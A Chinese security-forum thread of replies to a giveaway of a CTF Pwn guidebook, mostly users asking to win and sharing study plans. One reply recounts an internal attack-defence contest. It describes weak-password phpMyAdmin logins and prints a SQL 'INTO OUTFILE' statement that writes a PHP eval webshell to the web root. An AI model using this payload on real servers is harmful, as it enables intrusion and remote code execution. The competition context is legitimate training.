首页
社区
课程
招聘
【回帖赠书】10本《CTF竞赛权威指南(Pwn篇)(博文视点出品)》免费送,抢先读!
发表于: 2020-12-30 17:03 17860

【回帖赠书】10本《CTF竞赛权威指南(Pwn篇)(博文视点出品)》免费送,抢先读!

2020-12-30 17:03
17860
收藏
免费 7
支持
分享
最新回复 (160)
雪    币: 2278
活跃值: (12799)
能力值: ( LV12,RANK:312 )
在线值:
发帖
回帖
粉丝
26
第一层:学习原理/复现
第二层:从0~1构造Poc编写Exp
第三层:思考总结/拦截检测
2020-12-31 08:50
0
雪    币: 13387
活跃值: (4097)
能力值: ( LV8,RANK:133 )
在线值:
发帖
回帖
粉丝
27
想学习CTF,希望能得到一本,带我入门
2020-12-31 09:13
0
雪    币: 817
活跃值: (931)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
28
我来试试运气吧。
2020-12-31 09:14
0
雪    币: 277
活跃值: (3363)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
29
拉低中奖率
2020-12-31 09:19
0
雪    币: 5227
活跃值: (1161)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
30
老司机带带我
2020-12-31 09:22
0
雪    币: 5227
活跃值: (1161)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
老司机带带我
2020-12-31 09:22
0
雪    币: 5008
活跃值: (1147)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
32
感觉这是一本实操手册,应该对绝大多数人都会友好的;读者完全可以按图索骥,查缺补漏。祝愿书籍大卖,也感谢作者的辛勤付出。
2020-12-31 09:25
0
雪    币: 30054
活跃值: (3975)
能力值: ( LV2,RANK:15 )
在线值:
发帖
回帖
粉丝
33
    昨天在加密与解密群看到了这本书的推荐,作者介绍2017毕业,这本书是从大学开始到今年12月才出版,写的过程很艰辛,开始有几个人一起写,最后只剩作者一人,多次想放弃,但是最终把书完成了,从这里看出来作者真有毅力,勤奋+天分,这个让我连想到泉哥写的漏洞战争,开始也是有几个人写,后面只剩作者一人,写书真不简单,我个人看,能完成就不错了,要再保高质量,那是相当费心。浏览下目录,从目录上看书的内容由浅入深,由易到难的这么个结构,个人觉得还是有一定的基础再来看这本书比较适合,我是从多年买书的经验中得到的,所以这本书对于初学者可以不急着买,本人虽不是安全界从员人员,但平时也很喜欢研究下系统底层逻辑,只能业余时间研究下,全是靠自学,东学学,西学学,这是面深似海,学无止境。
2020-12-31 09:33
0
雪    币: 5514
活跃值: (2254)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
反正我是不可能中奖。
2020-12-31 09:37
0
雪    币: 8
活跃值: (120)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
我也想要一本呀
2020-12-31 09:43
0
雪    币: 14
活跃值: (240)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
36
写书不容易, 特别CTF最精华的Pwn,  从前几年开始传统央企国企都要求安全部门人员参加CTF比赛,  本人就经常被政治要求搞CTF培训比赛之类,  十分感谢作者呕心撰写实战书籍, 此书必定大卖
2020-12-31 09:49
0
雪    币: 3017
活跃值: (27747)
能力值: (RANK:420 )
在线值:
发帖
回帖
粉丝
37

自身情况:

接触过web渗透与软件逆向,但还未曾系统接触过CTF,只是上周有幸参与了公司内部组织的AWD比赛。

兴趣因素:

上周公司内部组织了一场AWD比赛,有幸获得第一名(通过取巧利用phpmyadmin弱口令登录对手后台,并修改密码使其他队伍无法利用,执行sql上传webshell,之后刷flag)感觉还是挺有意思的,故想通过《CTF竞赛权威指南(Pwn篇)(博文视点出品)》这本书了解下CTF,并根据此书为入口系统的学习下CTF-Pwn方向,希望可以有收获。


展示:

组内职责分配:我为攻击手,故我就不介绍防守的事情了

  • 弱口令登录并修改密码使其它队伍无法利用


  • 利用后台自身sql功能上传webshell

SELECT '<?php @eval($_POST[pass]);?>'
INTO OUTFILE '/var/www/html/tesaa.php'

  • 上传成功

  • 利用上传的shell成功链接

  • 找到flag保存目录刷flag


在此感谢:

  • 作者写出此书

  • 博文视点提供此次抽奖机会

最后于 2020-12-31 10:01 被梦幻的彼岸编辑 ,原因:
2020-12-31 09:53
0
雪    币: 1967
活跃值: (388)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
38
PWN这部分的学习的确是花费了很大精力才有了一定的基础,但是因为自学的知识不够体系化,所以在实践中总是感觉束手束脚的,看了目录之后,相信这本书能够给与很大的帮助。
2020-12-31 10:02
0
雪    币: 1967
活跃值: (388)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
PWN这部分的学习的确是花费了很大精力才有了一定的基础,但是因为自学的知识不够体系化,所以在实践中总是感觉束手束脚的,看了目录之后,相信这本书能够给与很大的帮助。
2020-12-31 10:02
0
雪    币: 1657
活跃值: (924)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
40
拉低中奖率
2020-12-31 10:12
0
雪    币: 1119
活跃值: (154)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
41
想要这本书的理由:快要实习了,想通过这本书来看看pwn能不能作为以后工作,但我感觉自己很菜,一般是没什么希望的了,所以还是觉得给其他更有希望的人的,加油
2020-12-31 10:23
0
雪    币: 8715
活跃值: (8619)
能力值: ( LV13,RANK:570 )
在线值:
发帖
回帖
粉丝
42
能做分子我给大家表演胸口碎大石~
2020-12-31 10:32
0
雪    币: 8176
活跃值: (1815)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
想接触一下CTF,希望可以得到一本深入了解
2020-12-31 10:35
0
雪    币: 598
活跃值: (282)
能力值: ( LV13,RANK:330 )
在线值:
发帖
回帖
粉丝
44
拉低中奖率~~
2020-12-31 10:36
0
雪    币: 1122
活跃值: (1933)
能力值: ( LV3,RANK:20 )
在线值:
发帖
回帖
粉丝
45

二进制在网络安全领域属于比较晦涩的部分,入门难,进阶也很难。目前市面上的CTF相关的书中PWN的部分相对比较简略,感觉就是买web赠的pwn。我自从大学开始接触pwn,几年过去了,依然没能成为pwn大佬。CTF all in one 确实是一份不错的CTF入门学习资料,之前带学弟的时候总是给他们推荐。来年打算深入pwn学习,希望能够有所建树。理想中还是想成为二进制研究员,科恩在这个领域算是国内头部团队了,他们出的书一定不会差。虽然现在在web安全岗位,但我对pwn的热情一定不可磨灭。大家一起加油!!


最后于 2020-12-31 10:50 被lushanu编辑 ,原因:
2020-12-31 10:50
0
雪    币: 340
活跃值: (739)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
china 看了下今年的CTF发现自己知道的太少了,从第1题就放弃了,看了下别人文章,发现自己知道的真的太少了,太少了。另外这个印刷是错误还是啥的,有DA PRO这个软件吗?是干啥的?
感谢帮发现了错误,已经更正啦
2020-12-31 10:57
0
雪    币: 340
活跃值: (739)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
47
china 看了下今年的CTF发现自己知道的太少了,从第1题就放弃了,看了下别人文章,发现自己知道的真的太少了,太少了。另外这个印刷是错误还是啥的,有DA PRO这个软件吗?是干啥的?
试读样章已经上传成功,大家可以下载试读啦
2020-12-31 10:57
0
雪    币: 1620
活跃值: (2405)
能力值: ( LV5,RANK:65 )
在线值:
发帖
回帖
粉丝
48

队长,我要学pwn,我要打ctf,,fighting


最后于 2020-12-31 10:59 被哦哈哈哈哈编辑 ,原因:
2020-12-31 10:58
0
雪    币: 340
活跃值: (739)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
试读样章已经上传成功,大家可以下载试读啦
2020-12-31 10:59
0
雪    币: 2402
活跃值: (6808)
能力值: ( LV7,RANK:102 )
在线值:
发帖
回帖
粉丝
50
从零开始的CTF
2020-12-31 11:08
0
游客
登录 | 注册 方可回帖
返回
//